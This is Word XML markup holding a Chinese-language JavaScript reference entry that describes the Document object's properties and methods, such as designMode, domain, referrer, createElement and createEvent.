    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器在当前文档中显示的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string design</w:t>
      </w:r>
      <w:r>
        <w:t>Mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果这个属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>，整个文档是可编辑的，如果它的值为</w:t>
      </w:r>
      <w:r>
        <w:t>"off"</w:t>
      </w:r>
      <w:r>
        <w:t>，整个文档将不可编辑。（不过，设置了</w:t>
      </w:r>
      <w:r>
        <w:t>contenteditable</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素当然还可能是可编辑的。）参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档而言，这个属性是＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。因此，它和</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement.dir</w:t>
      </w:r>
      <w:r>
        <w:t>是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DocumentType doctype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点，表示文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly Element </w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档的根元素。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档而言，这个属性总是表示＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的那个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个根元素也可以通过自</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>继承的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组获得，不过一般它不是这个数组的第一个元素。也可参考</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档所在服务器的主机名（</w:t>
      </w:r>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:t>），如果没有对应主机则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。可以将这个属性设置为它自己的域名后缀以放宽同源</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>限制，并从获得访问相关域名下的文档的权限。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly </w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection embeds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection forms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档中的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element head</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档而言，这个属性对应＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection images</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档中所有</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DOMImplementation implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMImplementa</w:t>
      </w:r>
      <w:r>
        <w:t>tion</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string lastModifed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义当前文档最近修改的时间和日期。这个值来自</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器可选择性发送的</w:t>
      </w:r>
      <w:r>
        <w:t>Last-Modified</w:t>
      </w:r>
      <w:r>
        <w:t>头。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly HTMLCollection links</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档中所有超链接组成的类数组对象。这个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>包含所有带</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，但不包含＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Location location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window.location</w:t>
      </w:r>
      <w:r>
        <w:t>的同义词。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTM</w:t>
      </w:r>
      <w:r>
        <w:t>LCollection plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>embdes</w:t>
      </w:r>
      <w:r>
        <w:t>属性的同义词。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string readyState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果文档仍在加载中，这个属性值为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"loading"</w:t>
      </w:r>
      <w:r>
        <w:t>；如果文档已经完全加载完成，则值为</w:t>
      </w:r>
      <w:r>
        <w:t>"complete"</w:t>
      </w:r>
      <w:r>
        <w:t>。当它的属性改变为</w:t>
      </w:r>
      <w:r>
        <w:t>"complete"</w:t>
      </w:r>
      <w:r>
        <w:t>时，浏览器会在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string referrer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>链接到本文档的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，如果当前文档不是通过超链接访问的，或者如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器没有报告来源页面，则此属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性允许客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP referer</w:t>
      </w:r>
      <w:r>
        <w:t>头信息。注意拼写的不同：</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>头信息有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档中所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleSheet[]styleSheets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示所有嵌入或连接到文档中的样式表对象的集合。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，它包含由＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签定义的样式表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string title</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的纯文本内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档加载自的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。这个值经常与</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值一样，不过，如果一段脚本改变了片断标识符（</w:t>
      </w:r>
      <w:r>
        <w:t>fragment identifier</w:t>
      </w:r>
      <w:r>
        <w:t>）（</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性），</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>属性就可能不再指代同一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>了。不要混淆</w:t>
      </w:r>
      <w:r>
        <w:t>Document.URL</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window.URL</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Node adoptNode(Node node)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法将</w:t>
      </w:r>
      <w:r>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:t>从它目前所在的任何文档中移除，将它的</w:t>
      </w:r>
      <w:r>
        <w:t>owne</w:t>
      </w:r>
      <w:r>
        <w:t>rDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性改为当前文档，并确保它已做好插入当前文档的准备。与之对照，</w:t>
      </w:r>
      <w:r>
        <w:t>importNode()</w:t>
      </w:r>
      <w:r>
        <w:t>从另一个文档中复制节点但不删除它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关闭由</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法打开的文档流，强制显示所有缓存的输出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Comment createComment(string data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据指定的内容，创建并返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DocumentFragment createDocumentFragment()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建并返回一个新的空</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> createElement(string localName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据指定标签名，创建并返回一个新的空</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，标签名会转化为大写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element createElementNS(string namespace,string qualifedName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>创建并返回一个新的空</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点。第一个参数指定元素的命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>；第二个参数指定命名空间前缀和元素的标签名，中间用逗号隔开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event createEvent(string eventInterface)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建并返</w:t>
      </w:r>
      <w:r>
        <w:t>回一个未初始化的合成</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该参数必须指定事件的类型，值应该为一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>"Event"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"UIEvent"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"MouseEvent"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"MessageEvent"</w:t>
      </w:r>
      <w:r>
        <w:t>之类的字符串。创建</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象之后，可以对它调用一个合适的事件初始化方法来初始化它的只读属性，这些方法有</w:t>
      </w:r>
      <w:r>
        <w:t>initEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>initUIEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>initMouseEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>等。大多数特定于事件的初始方法本书都没有涉及，不过最简单的一个可以参考</w:t>
      </w:r>
      <w:r>
        <w:t>Event.initEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>。创建并初始化一个合成事件对象后，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Eve</w:t>
      </w:r>
      <w:r>
        <w:t>ntTarget</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>dispatchEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来分发它。合成事件总是有一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>isTrusted</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ProcessingInstruction createProcessingInstruction(string target,string data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据指定的目标和数据字符串，创建并返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>ProcessingInstruction</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Text createTextNode(string data)</w:t>
      </w:r>
    </w:p>
